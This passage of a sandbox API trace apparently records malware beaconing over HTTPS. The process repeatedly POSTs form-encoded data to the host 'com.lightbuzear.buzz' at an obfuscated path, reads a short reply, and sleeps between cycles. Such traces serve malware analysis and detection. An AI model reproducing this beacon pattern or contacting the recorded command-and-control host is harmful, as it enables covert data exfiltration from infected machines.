10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0246.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c30 [0246.431] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0246.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0246.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0246.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0246.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0246.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0246.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0246.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0246.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0246.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0246.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0246.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0246.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ae8 [0246.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0246.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0246.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ae8 | out: hHeap=0x4780000) returned 1 [0246.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815ae8 [0246.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800b68 [0246.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800b68 | out: hHeap=0x4780000) returned 1 [0246.433] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0246.433] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c08 [0246.433] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0246.433] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d98 [0246.433] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0246.433] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0246.433] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0246.433] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0246.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0246.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0246.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0246.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0246.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0246.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0246.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0246.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a28 [0246.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0246.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0246.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a28 | out: hHeap=0x4780000) returned 1 [0246.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815848 [0246.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e10 [0246.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e10 | out: hHeap=0x4780000) returned 1 [0246.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0246.435] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0246.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0246.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0246.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0246.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0246.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0246.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0246.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0246.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0246.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0246.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815830 [0246.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0246.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815860 [0246.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0246.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0246.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815860 | out: hHeap=0x4780000) returned 1 [0246.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800e10 [0246.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0246.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0246.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e10 | out: hHeap=0x4780000) returned 1 [0246.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800af0 [0246.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0246.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e10 [0246.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0246.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0246.437] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0246.437] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0246.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e10 | out: hHeap=0x4780000) returned 1 [0246.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0246.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0246.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0246.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0246.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0246.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0246.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a28 [0246.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a58 [0246.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a28 | out: hHeap=0x4780000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0246.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a58 | out: hHeap=0x4780000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800c80 [0246.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0246.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c80 | out: hHeap=0x4780000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800b18 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0246.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ed8 [0246.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0246.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0246.439] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0246.439] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0247.834] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ed8 | out: hHeap=0x4780000) returned 1 [0247.834] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0247.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0247.835] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0247.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0247.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0247.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0247.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0247.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0247.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0247.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0247.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0247.835] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0247.835] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815830 [0247.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0247.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815938 [0247.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0247.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0247.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0247.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800e38 [0247.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0247.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0247.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e38 | out: hHeap=0x4780000) returned 1 [0247.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800b90 [0247.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0247.836] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ed8 [0247.836] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0247.837] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0247.837] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0247.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0247.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ed8 | out: hHeap=0x4780000) returned 1 [0247.838] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0247.838] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0247.838] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0247.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0247.838] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0247.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0247.838] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0247.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0247.838] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0247.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0247.838] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0247.838] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0247.839] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815968 [0247.840] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0247.840] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0247.840] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0247.840] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800f28 [0247.840] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0247.840] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0247.840] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0247.840] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e60 [0247.840] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0247.840] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800be0 [0247.840] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0247.840] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0247.841] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0247.841] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0247.841] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800be0 | out: hHeap=0x4780000) returned 1 [0247.841] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0247.841] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0247.841] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0247.841] FreeLibrary (hLibModule=0x71570000) returned 1 [0247.841] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0247.841] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0247.842] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d98 | out: hHeap=0x4780000) returned 1 [0247.842] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c08 | out: hHeap=0x4780000) returned 1 [0247.842] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0247.842] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800eb0 | out: hHeap=0x4780000) returned 1 [0247.842] Sleep (dwMilliseconds=0x2710) [0247.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0247.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0247.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0247.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0247.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0247.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0247.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0247.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0247.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0247.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a10 [0247.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0247.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815830 [0247.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a10 | out: hHeap=0x4780000) returned 1 [0247.886] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0247.886] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0247.886] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815a70 [0247.886] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d98 [0247.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d98 | out: hHeap=0x4780000) returned 1 [0247.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0247.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f50 [0247.887] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0247.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0247.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0247.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0247.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0247.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0247.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0247.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0247.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815818 [0247.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0247.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815818 | out: hHeap=0x4780000) returned 1 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0247.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800d98 [0247.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0247.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d98 | out: hHeap=0x4780000) returned 1 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d98 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0247.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800b40 [0247.889] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0247.889] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0247.889] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0247.889] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0247.889] FreeLibrary (hLibModule=0x71780000) returned 1 [0247.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800b40 | out: hHeap=0x4780000) returned 1 [0247.890] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e38 [0247.890] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0247.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0247.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0247.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0247.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815818 [0247.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815938 [0247.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815818 | out: hHeap=0x4780000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0247.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0247.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815818 [0247.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0247.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0247.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0247.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f00 [0247.891] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0247.891] RtlAllocateHeap 